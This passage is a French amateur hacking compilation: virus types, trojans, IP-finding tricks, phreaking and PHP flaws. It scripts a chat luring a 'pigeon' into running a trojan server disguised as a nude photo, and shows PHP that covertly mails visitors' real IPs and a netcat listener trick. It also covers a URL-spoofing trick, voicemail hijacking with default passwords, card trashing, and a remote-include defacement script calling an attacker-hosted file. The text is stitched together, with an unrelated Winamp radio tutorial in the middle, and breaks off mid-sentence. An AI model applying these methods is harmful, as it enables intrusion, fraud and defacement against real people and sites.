polymorphes ; ils modifient leur aspect à chaque nouvelle infection. e)
Virus cryptés ; ils modifient leur code, ce qui complique leur détection. On
peut ajouter 2 cas, mais souvent moins fréquents à cause de leur puissance :
f) Cheval de Troie ; bombe à retardement implantée dans un programme. Il
peut se déclencher à tout moment ou attendre un signal externe. Ce n’est donc
pas un virus puisqu’il n’est pas conçu pour se reproduire et se propager. g)
Bombe logique ; variante du cheval de Troie, elle attend un signal externe pour
exploser. Ce signal peut être une date précise, un lancement d’un certain
programme etc.. Les dégâts causés par cette bombe peuvent être d’ordre matériel
des fois, comme une modification du BIOS pour entraîner une surcharge électrique
Fichier texte décrivant certain virus
3 : Symptômes d’une attaque
Voici les principaux symptômes : *Un chargement d’un programme plus
long que d’habitude. *Un réseau anormalement chargé. *Mémoire centrale
insuffisante. *Espace disque réduit. *Taille de fichiers qui s’accroît
anormalement. *Système et/ou programmes qui plantent. *Messages
d’erreurs ou messages curieux. *Un jeu de ping-pong apparaît. *Les
caractères s’écroulent. *Mélodies bizarres au format midi. *Accès disque
multipliés. *Perte de fichiers et de données. *Programmes refusant de
s’exécuter ou s’exécutent mais de façon anormale. *Autoformatage du disque dur.
4 : Fichiers cibles des virus
Le premier objectif est la
contamination de une ou plusieurs cibles qui lui permettront d’être relancé le
plus souvent possible. Une cible est appelée vecteur de contamination. En
principe, il existe 3 phases d’existence :
Infection ; le virus infecte
le système cible. Contamination ; il se duplique et infecte d’autres cibles sans
perturber le fonctionnement du système. Destruction ; il entre en activité
et produit les effets pour lesquels il a été programmé.
Cibles des virus
: -Fichiers exécutables, surtout les .COM (avec le très célèbre COMMAND.COM
qui est lancé à chaque démarrage du système ). -Fichiers systèmes,
particulièrement les IO.SYS et MSDOS.SYS (qui sont lancés au démarrage du
système aussi) . -Les fichiers temporaires de recouvrement .OVL .
-Fichiers binaires .BIN. -Fichiers pilotes .DRV. -Le secteur de la table
de partition du disque dur (lu par le BIOS à chaque initialisation) ou d’une
disquette BOOT.
Les trojans
Le troyen ( trojan pour les intimes) est
selon moi une technique réservé au débutant mais qui est quand même assez drôle
a condition de pas faire le con. En effet, si vous infectez quelqu'un, vous
pourez faire tous ce que vous voulez de son pc: l'éteindre, récupérer son mot de
passe, désactiver le clavier... et des choses encore pire que je ne détaillerai
pas ici. En vous introduisant sur un pc, vous transgresser la loi et les peines
peuvent être lourde. De plus, a partir du moment ou la victime se rend compte
qu'elle est infecté, elle peut très facilement riposté. Comment? Cela sera
abordé dans cet article, qui n'a pas pour vocation de vous donner le mode
d'emploi pour s'introduire sur un pc mais plutot de vous informer sur les
risques que vous courez et les moyens de vous défendre.
Un troyen, c'est
quoi ?
Le cheval de Troie vous connaissez ? C'est un truc en bois
construit pas des mecs en armure pour prendre une ville fortifiée par la ruse...
Si ça s'appelle comme ça, vous l'aurez compris, c'est parce que ça reprend la
méthode... La forteresse c'est le PC, le cheval c'est le programme, l'assaillant
c'est toi et la victime c'est le pigeon. Si tu réussi, la victime est mal barré.
Le problème consiste à envoyer un fichier infecté à la victime en lui faisant
croire que c'est autre chose. Si elle l'ouvre et que vous avez son IP vous
pouvez vous balader dans son PC ... !
Comment ça marche ?
Un
trojan est composé de deux parties : le client et le serveur ! Le client c'est
ce que vous allez utilisez pour débarquer chez la victime et le serveur c'est la
partie piegée que votre victime va exécuter. Pour les attardés je signale qu'il
ne faut jamais, mais alors JAMAIS ouvrir le fichier serveur sous peine de me
voir débarquer sur votre disque dur avec des intentions plus que mauvaises. Nan,
c'est une blague ... mais bon c'est juste qu'il faut être prudent avec les
trojans !
Au fait, il se peut que votre antivirus s'excite quand vous
exécutez le troyen. Sachez que c'est entièrement normal et que c'est la preuve
que l'antivirus est prudent. Mais les hackers travaillent 100 % sans antivirus
en reposant leur capacité à se protéger sur leur connaissances personnelles.
Alors si vous voulez utiliser le troyen vous avez plus qu'à l'éteindre !
Qu'est ce qu'il faut faire ?
J'imagine que vous avez compris
que le principal problème est de faire ouvrir le serveur à la victime . pour
cela il y a le Social Ingeneering !!! C'est l'art de contrôler votre victime
avec la psychologie.
Voici un exemple sur un chat :
Ici,
sexy-girl c'est le hacker et pigeon bah.... la pigeon !
sexy girl: Salut
tu peux m'aider SVP ?
pigeon :Oui, C'est sur c'est quoi ton
prob?
sexy girl: ma boite aux lettres caramail déconne, tu peux me mailer
pour voir si elle fonctionne ?
pigeon: ok, je veux bien mais j'ai quoi en
échange ?
sexy girl : bah si ça marche, je te renvoie ma photo de moi à
poil!
pigeon :Youhouhhh!!! Super ! Ok, je te mail tout de suite
!
sexy girl: Merci t'es gentil..!
Voila, c'est dans la poche
!! Vous recevez le mail, et lui envoyer le SERVEUR du troyen comme photo !!!
Si le mec dis que son antivirus s'excite, alors c'est perdu
....
Mais si il dit que la photo marche pas , c'est qu'il a cliquer sur
le trojan...
Plus d'infos sur les trojans:
Comme vous pouvez vous
en doutez, infectez quelqu'un est très facile. En effet, l'internaute lambda
(90% des surfeurs) se fait avoir a tous les coups.
Ceci est en grande
partie du à la puissance des troyens dernière génération. Prenons optix pro par
exemple, qui est sans doute un des troyens les plus puissant, le fichier serveur
n'est pas fournit dans le package, il y a un fichier edit server qui permet de
créer le dit serveur en parametrant des tas d'options. Entre autre fonction, il
y a le choix de l'icone (setup, zip, rar...) et la possibilité de recevoir les
ip sur icq. En clair, dès qu'un mecs infectés se connecte, le serveur envoie un
message sur votre pager icq. De plus, beaucoup d'antivirus ne le reconnaisse
pas. Il n'a donc aucune chance d'en réchapper sauf si il a déjà lu cet article
qui va maintenant expliqué comment contré une attaque.
D'abord, comment
savoir si je suis infectés?
Quand un PC est infecté, le mecs qui a
installé le trojan et qui veut s'amuser va faire faire tout un tas de connerie a
votre ordi. Il va ouvrir votre lecteur cd, éteindre votre écran, bloquer votre
clavier, inverser les touches de la souris, faire disparaitre le menu démarer...
et la liste est encore longue. Si vous remarquer un des ces symptomes (ou un
autre trucs bizarre), vous êtes peut être infectés.
Je suis infecté! Que
faire!!!
Donc si vous constater quelquechose de bizarre, le 1er réflex
est de couper la connexion. Ensuite il va falloir installer un pare feu. C'est
bien gentil tout ça, mais il faut se connecter pour telecharger le pare feu. Et
c'est justement là le problème, soit vous avez un autre PC, vous télécharger le
pare feu et vous le transférez sur le pc, soit il va falloir se connecter. Si
vous avez un antivirus non mis à jour, vous pouvez toujours essayer de le mettre
vite fait à jour pour que le cas échéant il arrive a vous débarraser du serveur,
mais c'est souvent peine perdu, le mecs qui vous hack a surement déjà bousillé
votre antivirus. Donc attendez quelques heures avant de vous reconectez,
télécharger en vitesse zone alarm, paramétrez le ,définissez les accés, et
attendez. Maintenant que vous êtes protégé, 2 choix s'offre à vous: -je veux
choper ce petit merdeux ou -je veux me débarasser de cette saloperie au plus
vite. Pour la 2nd solution, allez sur un antivirus online gratuit comme celui de
panda, qui est efficace. (panda active scan) et regardez si il détecte la bête.
Si vous optez pour la première solution, attendez que le mecs essaye de se
connectez et paf!, zone alarm détecte que quelquechose de non autorisé essaye de
pénétrez sur le pc, et non seulement vous l'avez bloquer, mais en plus vous avez
choper son IP. Grace à elle, vous allez pouvoir porter plainte au fournisseur
d'accé. Notez bien ce l'IP et l'heure a laquelle l'attaque a été lancé. Ensuite,
renseignez vous sur les moyens d'agir.
Comment trouver une IP
L'IP est la base du hacking :
elle permet d'identifier un ordinateur de particulier ou un serveur connecté sur
internet. C'est la seule
façon de pirater quelqu'un car il faut
l'identifier. Ce tutoriel va donc vous enseigner comment faire pour trouver une
IP !
Voici comment voir votre IP : Quand vous etes
connectés, faites : "demarrer/executer/winipcfg" Une fenetre va s'ouvrir
et il y aura pas mal d'infos, dont votre adresse IP... Trouver l'adresse
IP d'un type : Technique 1 : Trouver l'IP d'un gars sur IRC.
Faites juste whois pseudo_du_mec Cette technique, peux suffire,
ca depend de votre config, du serveur utilisé etc... Mais si ca suffit
pas, faites la deuxieme technique. Technique 2 : Encore pour IRC :
Bon, bein cette fois-ci vous faites /who pseudo_du_type %in
Et dans la fenetre "status" vous aurez son IP. Si jamis ca
marche toujours pas, employez la maniere forte en faisant la 3eme technique :
elle marche a touts les coups Technique 3 : Toujours sur IRC : Pour cela, taper :
/whois pseudo_du_type Et la, dans la fenetre "status", il y aura des
infos sur ce type. La regarder dans toute les infos qu'on vous donne et
trouvez un truc le genre: ~v493@EVYVUV4z.ipt.aol.com ou
~v827@Xocse7im7Qs3A8sUs30I.abo.wanadoo.fr etc... Ensuite vous
lancez le logiciel "FuckDax" et dans la case vide nommée "Host code" vous mettez
le charabia que vous vous avez trouvé en faisant "whois ...". Ensuite
cliquez sur "Decode". Et dans la case "Adresse IP" va apparaitre
l'adresse IP de votre futur victime. Tout simplement :-@
Technique 4 : Trouver l'IP d'un mec sur ICQ : Cliquez avec
le bouton droit sur le pseudo du mec plus allez dans "user's details" La
on vous donnera son adresse IP. Mais ce qui est con c'est qu'il y en a
qui cache leur adresses IP (y'a marqué N/A a la place) Mais ce qui est
con pour eux, c'est qu'il existe quand meme un moyen de trouver leur IP :-)
Pour cela, laissez la fenetre info ouverte, mettez votre ICQ sur
"offline" et fermez la fenetre info. Maintenant refaite la meme chose
qu'au début (quand c'etait écrit N/A) Et voila, son adresse IP est enfin
accessible :-) Et si ca marche toujours pas, envoyez un méssage a la
victime suivi d'un "netstat -n" , vous trouverez pleins d'informations
sur l'ordinateur: l'ip, les troyens infectés, etc...
Technique 5 :
Trouver une IP par mail: Bein toujours aussi simple, vous envoyez un
mail (vous y foutez ce que vous voulez), le principal etant que votre victime
réponde. Et des que vous recevez le mail de votre victime, vous faite un
clic droit sur le mail et vous cherchez un truc genre "proprietes" ou
"statut" etc... PS: A noter que sur AOL, l'IP se trouve en fin
de mail... Technique 6 : Trouver une IP sur caramail: Avoir l'IP
d'un membre. Cette methode est la seule connue. Pour avoir son Ip, il
faut que cette personne vous écrive un message. Ouvrez-le et allez dans
"en-tete". L'Ip s'y trouve.
Technique 7 : Trouver une IP avec votre
firewall Si vous etes equipés d'un firewall, vous avez du remarquer que
quand un hacker tente de vous hacker, votre firewall réagit et il vous
affiche l'IP de la personne qui vous attaque... Voila, tout
simple ;-)
Technique 8 : Trouver une IP sous AOL Il faut que
votre victime ai AOL et que vous parliez avec elle grace aux mess eclairs.
Il faut le logiciel Serv-u Allumez serv-u, un petit icone
s'allume en bas a droite. Faites un clic droit sur cet icone et choissisez
"Start Serv-U". Puis choisissez "Start Administrator". Dans la
fenetre qui s'ouvrira, allez dans le menu "help" puis choissisez "Local IP
Adress". Dans une petite fenetre, votre adresse IP sera affichée. (Oui
j'ai bien dit VOTRE adresse IP)
Maintenant retourner sous AOL et
envoyez un message eclair a votre victime. Dans le
message, créez un
lien hypertexte avec comme adresse: ftp://votre_adresse_IP/ et comme description ce que vous
voulez (choissisez
quelque chose qui apatera votre victime car pour
avoir son IP, il faut qu'elle clic sur votre lien hypertexte).
Des que
votre victime aura cliquer sur le lien, l'icone en bas a droite devient bleu,
revenez sous serv-u et dans la fenetre il y aura
d'ecrit, l'IP de votre
victime.
PS: Pour creer un lien hypertexte dans un message eclair,
faites un clic droit
sur la fenetre des messages eclairs, puis
choisissez "Créer un hyperlien..."
Alors, c'est pas beau ca ?? ;-)
Bon c'est juste quelques techniques mais vous pouvez en trouver d'autres
...
La premiere chose a faire pour trouver des astuces c'est réfléchir
Trouver une IP d'un
Serveur
Maintenant on passe aux choses sérieuses
Pour trouver l'IP d'un serveur
faites :
Cliquez sur Démarer
Exécuter
Et tapez ping www.lesite.com
l'adresse
sera renvoyé dans la réponse du serveur.
Avoir l'IP réelle d'un gars
derriere son Proxy
hello, en fait je vais vous exposer ici quelques
techniques vous permettant de recuperer l'IP reelle d'un gars
se
connectant au net par l'intermediare d'un proxy. En effet dans ce cas
vous voyez l'IP du proxy, et non la sienne.
C'est le but d'ailleurs, non
?
Mais on va pas se laisser demonter %-)
** (PETITE NOTE
PERSONNELLE : Pour avoir une simple IP, il y a moult methodes, vous les
apprendrez facilement sur
le Net ... Ou dans un prochain tuto)
**
Donc je vais exposer 2 methodes.
* 1 ere methode, est en fait
un melange d'infos recoltees sur le net et de reflexion personnelle qui vous
permettra de recevoir dans votre boite mail l'IP d'un gars qui se promene sur
une de vos
pages sur un site. Pour cela votre site doit etre heberge sur
un serveur supportant PHP, avec la fonction mail();
activee (actuellement
c'est le cas de Lycos/Multimania, les autres je sais pas).
L'idee est
donc que les proxies sur lesquels se connectent les gars envoient souvent dans
le Header des infos,
dont la fameuse IP. Ces donnees envoyees par le
serveur se nomment les VARIABLES D'ENVIRONNEMENT. Les
variables
d'environnement standard permettent d'ailleurs de recuperer
l'IP d'un gars, mais ce n'est pas le but de notre tuto...
Ici nous nous
interesserons aux variables d'environnement propres aux proxies HTTP, qui sont
au nombre de 6 :
HTTP_PRAGMA Ancien mecanisme de gestion des methodes de
cache des pages d'un serveur HTTP
HTTP_CACHE_CONTROL Indication
concernant les preferences du client HTTP en matiere de
cache
HTTP_CACHE_INFO Utilise par certains proxys pour indiquer au
serveur HTTP combien de clients HTTP
ont effectue cette requete par son
intermediaire
HTTP_PROXY_CONNECTION Seulement definie par certains proxys
lorsque le client HTTP effectue sa requete par
leur
intermediaire
HTTP_VIA Adresse, port utilise, nom et version
du proxy utilise pour la requete. Seulement definie par certains
proxys
HTTP_X_FORWARDED_FOR Utilise par certains proxys pour indiquer
l'adresse de la machine cliente pour laquelle
ils effectuent la requete
HTTP
Je tiens d'ailleurs a remercier ici "Le Lamerz" (qui n'en est pas un
d'ailleurs !!!) pour ces precieux renseignements !
^_^ Merci
Ici
la variable qui nous interesse est la derniere, HTTP_X_FORWARDED_FOR, qui
contient l'IP du gars derriere le proxy.
L'idee est donc que le serveur
sur lequel est heberge votre page PHP lit les informations envoyees par le proxy
se connectant
a lui, donc cette variable. Il est donc capable de la
restituer par la fonction PHP getenv("param"); qui recupere la
variable
d'environnement nommee "param". Donc
demande a votre
serveur d'hebergement de stocker dans la variable $vraieip la vraie IP, c'est a
dire le contenu de la
variable d'environnement HTTP_X_FORWARDED_FOR. Vous
pouvez l'afficher a l'ecran pour faire peur au gars, avec
"print
$vraieip;"
mais notre but est de la recuperer discretement, en nous
l'envoyant par mail. Il suffit de coder ceci :
$vraieip =
getenv("HTTP_X_FORWARDED_FOR");
mail("votre_mail@serveur.ext", "IP
recoltees sur ma page internet", $vraieip);
?>
et si comme je
vous le disais au debut votre serveur d'hebergement accepte la fonction mail();
c'est dans la poche !
Pour ma part j'ai inclut ce script une journee sur
mon site, juste pour tester, mais j'ai ete litterallement mail bombe
!!!
En effet le serveur renvoie l'IP a chaque reactualisation. Je l'ai
donc vite retire, puisque de toute facon mon but n'est pas
de hacker mes
visiteurs.
PAr contre si le gars ne passe pas par un proxy, la variable
reste vide, vous devez donc envoyer par mail l'IP provenant
de
HTTP_X_FORWARDED_FOR, mais aussi celle de la variable d'environnement
classique permettant de recuperer l'IP normale
* Une 2eme methode,
montree par Hyatus (je sais pas si il l'a trouvee tout seul), sur le forum de http://www.newffr.org.
Elle consiste toujours a amener
le gars sur une page internet concoctee par vos soins :p
Cette fois-ci
pas besoin de PHP, juste un script javascript, a lancer au chargement de la
page, le voici :
Voici le texte fourni par Hyatus en explication
:
-------
Alors que vous pensiez etre anonyme derriere votre
proxys... Je vous demontre le contraire !
Pourquoi ? Comment
?
Simplement par ce que le proxy utilise le protocole HTTP, et n'est
fonctionnel qu'a travers
les structures utilisant HTTP, or la j'ai
engendre sur votre navigateur une connexion Telnet
a mon serveur sur le
port 25 (sendmail) ...
Je verrai alors dans mes logs votre vraie IP c'est
une application reelle !
Mais le meilleur n'est pas la ...
Ici
j'ai utilise une connexion reelle de Telnet qui se dirige vers un serveur SMTP
dump
mais j'aurais tres bien pu rediriger la connexion vers une petite
application qui se
charge de garder les logs et DANS CE CAS VOUS N'AURIEZ
SIMPLEMENT RIEN VU !
Donc ne croyez pas que le proxy soit quelque chose
de fiable, bien au contraire !
Bien
Amicalement,
hyatus
-------
Maintenant mes explications et
eclaircissements apres analyse
Vous devez remplacer Hanidz.com par votre
serveur, ou mieux votre machine (entre votre IP, je sais c'est
dangereux).
C'est ici qu'intervient l'utilisation du logiciel NetCat (ce
qu'il appelle l'application qui garde les logs, c'est ca !)
fourni avec
un tuto d'explication. Il suffit dans le script de mettre votre IP au lieu du
serveur, et sur votre machine
de lancer NetCat en mode ecoute (listen)
sur le port 25 (port sendmail). La commande est, apres avoir lance
natcat,
"-l -p 25".
Ainsi vous ecoutez tout ce qui vient sur votre
port 25.
Dans notre exemple le script ouvre chez la victime ouvre son
port telnet (23) et se connecte a votre IP au port 25.
Le script si votre
IP est 145.167.4.34 sera :
Cette technique oblige donc le
navigateur du gars a se connecter a votre IP sur votre port 25.
En effet
les proxies filtrent les connections HTTP (port 8080), mais pas Telnet (25),
donc le fait d'obliger le gars a
se connecter a votre serveur (netcat en
fait) vous devoilera son IP en regardant dans vos logs de netcat.
Et
voila vous avez eu vos 2 methodes !!!!!
Si il chaine les proxies, je ne
peux rien pour vous, ou alors allez vous faire embaucher a la DST, eux ils sont
forts, mais
il faut dire qu'ils ont la loi de leur cote
J
J H4ni J
Faille IE: spoofing d'URL
Voici une faille qui,
bien que pas des plus graves peut être dangereuse. En effet, elle permet a
n'importe qui de masquer la vraie URL s'affichant dans la barre d'adresse en la
remplaçant par l'adresse définit par la personne mal intentionné. Cette
faille concerne Internet Explorer à partir de la version 5.5 et ses dérivés
(Crazy Browser, myIE...) exepté la dernière version de my IE. Je n'ai pas pu
tester sous Netscape, si vous trouvez un navigateur touché par la faille, merci
de le mettre en commentaire. Même IE Sp1 est touché par ce problème. A ce jour,
aucun patch n'est encore sortit. Merci microsoft.
Donc grâce à cette
faille, on peut faire croire à une personne qu'elle surfe sur un site alors
qu'elle en est sur un autre. Pour ce faire, Il faut juste insérer le caractère
0x01 avant le signe @ dans une URL de type http://user@domain. De cette manière, Internet explorer
n'affiche pas le vrai domaine mais uniquement le nom de l'utilisateur.
Faites votre radio sur le web
Cette page conçu pour
vous montrer comment se créer une Web Radio avec Winamp.
Tout d'abord,
il vous faut Winamp v2.80 (Ne prenez surtout pas la version 3, cela ne
fonctionnera pas) - Site Officiel.
Une fois que vous avez téléchargé
et installé winamp, vous allez pouvoir télécharger ces 2 plug-in (il faut a
tout prix les avoir tout les 2 sinon ca ne fonctionnera pas non
plus)
¤ Shoucast Source ¤ Shoutcast Server
Maintenant nous
allons commencer l'installation et la configuration des 2 plug-in, véréfiez
bien que winamp est correctement fermé. 1/ Installer
shoutcast-1-8-9-windows.exe 2/ Installer shoutcASP.exe 3/ Ouvrir Winamp
4/ Allez dans Option > Préférences (CTRL+P) et clickez sur
DSP/Effect
5/ Clickez sur "Nullsoft SHOUT Cast Source DSP v1.8.2
(dsp_sc.dll)" et ensuite clickez sur le bouton configuration Une
fenêtre s'ouvre se nomant "SHOUT Cast Source" - Vous pouvez fermer la fenêtre
des préférences. 6/ Dans l'onglet OUTPUT, mettez votre IP (IMPORTANT: ne
changez surtout pas le Port ni le password !!) Si vous savez pas comment
avoir son IP, il existe 2 manières de le connaitre, soit avec Net Meeting
soit en allant dans "Démarrer > Exécuter" et vous tapez
"C:WINDOWSWINIPCFG.EXE"
Dans l'onglet Encoder choisissez votre encodage
pour les petites connections (Cable, ADSL 1), il est conseillé d'avoir un
encodage soit à 24kbps 22050kHz Mono (possibilité d'avoir plus d'audience
mais d'avoir un son de mauvaise qualité) ou bien un encodage a 48kpbs
22050kHz Stéréo (moin d'audience mais son de meilleur qualité).
Maintenant c'est a vous de choisir 
Maintenant nous allons procèder à
la connection de tout ce petit merdier.
1/ Lancer le fichier sc_serv.exe
(répertoire "C:Program FilesSHOUTcast" ) 2/ Clickez sur CONNECT dans
l'onglet Output. Normalement si tout fonctionne bien, vous devriez avoir ceci
a été dans la case status: [0D 0:00:00] Sent 0 byte Il vous reste plus
qu'à lancer votre music et le tour est joué Pour écouter votre radio, il
suffit tout bètement de mettre cette adress dans winamp (CTRL+L): http://votre_ip:8000
c'est
fini
Phreaking
Préambule Avant d'aborder le sujet du
phreaking, voici un glossaire des thèmes utilisés dans cet article
:
Boxing : Le " boxing " est l'art de créer des montages
(initialement électroniques mais qui peuvent être réalisés en soft) pour pirater
les lignes téléphoniques ou les détourner.
Card trashing : Méthode
dite de " fouille des poubelles " pour trouver des numéros de cartes bancaires
afin de recharger gratuitement des cartes téléphoniques.
PABX : Un
PABX (Private Automatic Branch eXchange) est un système permettant de gérer
informatiquement un grand nombre de lignes de téléphonie. On peut accéder au
PABX par l'extérieur (modem, téléphone) ou par l'intérieur (PC, VAX, terminal).
Un PABX peut se commuter sur le réseau externe de l'entreprise et l'on appelle
alors cela un " outdial ". Un PABX peut être complété par un boîtier RMA, qui
est un élément permettant une interconnexion d'un réseau et d'un PABX à des fins
de management distant.
VMB : C'est une boite vocale qui repose sur
le PABX, comme on peut en trouver sur la plupart des entreprises.
Introduction Le Phreaking est à la téléphonie ce que le hacking
est au réseau.....
On comprend par phreaking toutes les méthodes pour
pirater un système lié à la téléphonie. Cela comprend la corruption et le
détournement de PABX, de VMB, de téléphone portable, de modem, etc.
Le
but ultime est de téléphoner gratuitement.
A noter que le terme phreaking
provient de la contraction des deux mots anglais phone (téléphone) et freak
(monstre) pour aboutir au terme phreaking.
Pour cela il existe de
nombreuses méthodes, notamment le passage par un PABX
Le but d'un
phreaker est d'appeler gratuitement ses copains ou des services téléphoniques
payants.
La méthode la plus représentative du phreaking est d'essayer de
pénétrer une boîte vocale sur un PABX et de se servir de la fonctionnalité de
transfert d'appel.
Mais reprenons depuis le début.
D'abord,
qu'est-ce qu'un PABX ? C'est un système qui gère plusieurs lignes téléphoniques.
Typiquement, quand vous téléphonez à une compagnie et que vous entendez un joli
message enregistré qui vous demande d'appuyer sur " 1 " pour avoir tel service,
sur " 2 " pour tel autre, etc., c'est qu'il y a un PABX au bout qui gère les
appels.
Une méthode souvent utilisée par les phreakers est de scanner des
numéros de téléphone, tout comme un hacker scannerait des ports IP. A la
différence près que scanner un numéro de téléphone demande de payer la
communication et que si un phreaker scanne beaucoup de numéros, la facture sera
lourde, ce qui est totalement contraire au but recherché !
Donc, en fait,
les phreakers essayent généralement de scanner ... les numéros verts ! (qui
présentent donc l'avantage d'être gratuits). A moins qu'ils n'aient récpéré une
liste pré-établie de PABX (sur Internet par exemple).
Signalons que ce
scan peut être réalisé automatiquement à l'aide d'outils spécifiques ou à la
main, pour les courageux.
Une fois que le phreaker est arrivé à tomber
sur un PABX, sa prochaine mission va être de trouver la séquence permettant
d'accéder aux boîtes vocales. Cette séquence peut être du style " ** " ou " 0# "
et si le PABX la reconnaît, il demandera le numéro de boîte vocale puis le mot
de passe.
Les numéros de boîte vocale ne sont généralement pas difficiles
à deviner ou à trouver (par social engineering par exemple). Il faut ensuite
trouver le mot de passe et souvent les boîtes vocales ne laissent que 3
possibilités avant de se bloquer. Il faut donc oeuvrer avec méthode. La
technique la plus utilisée est de tenter les mots de passe par défaut usuels
(1234, 1111, 5555, etc.). Ces mots de passe dépendent généralement du
constructeur du PABX et ils peuvent être trouvés tout simplement sur
Internet.
Une fois que le phreaker a saisi la séquence de touche
permettant d'accéder aux boîtes vocales, le numéro de la boîte piratée et le mot
de passe, il peut faire pratiquement ce qu'il veut : changer le message
d'accueil, écouter les messages, les effacer, etc.
Mais ce qui
l'intéressera par dessus tout, c'est la présence d'une fonction de renvoi
d'appel, car à ce moment là, il lui suffit de programmer la boîte vocale pour
qu'elle " switche " sur un autre numéro quand on l'appelle.
Il ne reste
alors plus qu'au phreaker qu'à raccrocher et à rappeler la boîte vocale pour
être différé automatiquement sur le numéro programmé sur le transfert
d'appel.
Le boxing Le Boxing est une technique de phreaking qui
consiste à faire des montages (hard ou soft), généralement assez simples
(quoique ...), qui ont pour but de pirater ou de détourner des lignes
informatiques.
La grande liste des box a démarré avec la Blue Box. La
première Blue Box a été créée dans les années 60 aux USA par des étudiants du
M.I.T. La technique consistait à appeler un numéro vert et à lui envoyer un son
qui fait croire au centrale que la ligne est redevenue libre. A partir de là, on
peut téléphoner n'importe où, gratuitement, comme si on appelait toujours un
numéro vert.
Il existe de nombreuses box différentes. Citons également la
Beige Box, qui est la plus simple de toute. Il suffit d'acheter un téléphone
standard, de couper la prise du téléphone et d'y mettre des pinces crocodiles.
La Beige Box se connecte ensuite à n'importe quel fil téléphonique et permet de
téléphoner au frais du propriétaire du fil téléphonique.
Une multitude de
type de box existe. Toutes les couleurs sont pratiquement répertoriées (White,
Black, Red, Yellow, Magenta, Mauve, Violet, Gold, Silver, Brown, Aqua ... ) et
certaines portent des noms vraiment exotiques (Cheese, Jack, Pearl, Chartreuse,
Acrylic, Lunch, Scarlet, Urine ...).
Le card trashing Le card trashing
est une méthode qui tend à disparaître, car elle consiste à essayer de récupérer
des tickets de carte bancaire, avec les informations complètes du titulaire du
compte. Or, des préconisations ont été données pour ne plus afficher le numéro
de carte complètement. Néanmoins, certains endroits étaient réputés pour faire
du card trashing, comme les pompes à essence par exemple.
L'utilisation
des données bancaires permet bien entendu de multiples fraudes, mais dans le cas
du phreaking, ces données permettent de regénérer des unités de cartes
téléphoniques, et donc ... de téléphoner gratuitement.
Le trashing en
général peut aussi être utilisé pour trouver des numéros d'identification de
téléphones cellulaires. A ce moment là, il doit être pratiqué dans les poubelles
des opérateurs de téléphonie cellulaires.
Téléphones cellulaires Un
autre moyen de téléphoner gratuitement est d'utiliser son propre téléphone
cellulaire, mais en se faisant passer pour un autre utilisateur.
Pour
cela, il faut récupérer un identifiant, ce qu'on appelle un ESN. Le trashing
peut y aider. On peut aussi utiliser une méthode plus sioux : le snarfing, qui
consiste à intercepter l'identifiant grâce à une " box " spéciale.
Une
fois un ESN récupéré, il faut re-programmer le téléphone cellulaire, soit par
ordinateur, soit par l'introduction d'une autre puce.
Ce type d'attaque
est essentiellement perpétré sur les téléphones cellulaires analogiques (qui ne
sont plus vendus d'ailleurs). Pour les téléphones numériques, la méthode
consistera plutôt à essayer de simuler une carte téléphonique. Ces attaques sur
réseau cellulaire sont essentiellement perpétrées aux
Etats-Unis.
Conclusion Plusieurs autres méthodes existent pour
téléphoner gratuitement, à partir des cabines téléphoniques par
exemple.
Notons quand même que certains pays ont un réseau téléphonique
plus facilement " phreackable " que d'autres, et notamment les
Etats-Unis.
Rappelons enfin que si beaucoup de compagnies pensent à
protéger leurs accès Internet, elles devraient en faire de même de leurs accès
téléphoniques !
Faille !!include!! infos ou intox ?
Il suffit de
taper sur google : faille php !include!, pour obtenir des tonnes de sites sur le
hacking et une faille sur la fonction !include! !
Infos ou intox ?
Voici la faille décrite en détails
:
------------------------------------ Vous savez tous que l'avantage
du PHP sur l'HTML est que le PHP est dynamique, ça veut dire que vous pouvez
changer le contenu des pages visionnées. L'URL si dessus charge une page
index.php dite "normale" puis y inclut le code de la variable $page, suivit de
l'extension PHP bien évidemment. Dans notre exemple la page qui sera visible
sera donc la page Team.php. En conclusion http://www.site.com/index.php?page=Team revient à indiquer
l'URL http://www.site.com/Team.php La faille d'!include! est une
faille courante présente sur un grand nombre de sites. Elle est de plus trés
simple à exploiter. --> la localiser : Il faut trouver un site avec des
url du type :
www.lesite.fr/index.php?url=page.php http://www.site.fr/index.php?var=admin.php
Pour
vérifier si la faille est présente , on va donc essayer "d'inclure"notre URL :
http://www.lesite.fr/index.php?url=http://www.google.fr ou http://www.site.fr/index.php?var=http://www.google.fr Là
si l'index apparait dans le site , c'est que le site n'est apparament pas
protégé
Pour defacer le site
On va donc pouvoir essayer
d'ajouter du code en utilisant la fonction fwrite() ce qui aura pour effet
de déffacer l'index du site ! Il suffit de faire ce petit scipt php et de le
stoker sur un compte :
$fp=fopen("index.php", w); $msg="le message
de ton defacage "; fwrite($fp,$msg); fclose($fp); ?>
Voila, maintenant il suffit de faire comme on a vu plus haut , admettons
que ta page du script se nomme deface :
www.lesite.fr/page.php?url=http://[mon site]/deface.php
Voila , c'est pas plus compliqué que ça.
___________________________________
mais je pense que ce tuto est
faux car si vous faite cela,
: $fp=fopen("index.php", w);
cela
écrit sur VOTRE page index.php  j'appelle cela : Se hacker soit même !
!!!!!!!!!!!!!
Voila.
il faudrait taper :
$fp=fopen("http://[lesitecible]index.php", w);
mais cela ne marche
pas.
Avec une modification en local de son phpinfo(), la fonction
!include! permet peut etre l'inclusion de fichier distant ?
PDS-BANNIERES
Pds-bannières est un script PHP qui
vous permettra d'installer sur votre site un véritable échange de bannière mais
aussi en même temps un échange de bouton (88*31).
Ce script à eu pas mal
succès et provient du site : www.plusdeservices.com qui n'existe plus de nos jours.
Malheureusement il est à l'origine d'une grosse faille de sécurité qui a
coûté une petite intrusion dans ensemble de la base SQL et la petite trace sur
la page d'accueil à plusieurs webmaster.
Je rappelle à se passage que la
vraie définition du hacker et celui qui trouve des failles et permet à la
victime de sécuriser son site et non pas collecter des informations ou défacer
sa page d'accueil.
Cette faille était présente sur le site http://actu-music.com qui d'après
sa page d'accueil a fait les frais d'un mauvais plaisantin (qui pense sûrement
d'ailleurs être un grand hacker).
Explication de cette faille:
Tous les webmaster qui connaisse le PHP se servent des variable
d'environnement du type : pour connaître l'adresse IP de la personne...
PHP propose toute une série de variables qui sont déjà implantées dans
le langage sans que vous ayez quelque chose à faire, on les appellent les
variables d'environnement.
Il en existe une très utile : $REFERER
$REFERER pour connaître la dernière page visité avant votre site. Cela
ne marche pas toujours, mais il est donc possible de savoir si vos visiteurs
arrivent de google et, de plus, les mots taper dans le moteur car les variables
sont passer par la méthode GET. [ plus d'infos sur la méthode GET ] à cette
adresse :
http://selfhtml.selfhtml.com.fr/cgiperl/introduction/traitementformulaire.htm
Reprenons:
L'affichage de votre variable $REFERER est de cette
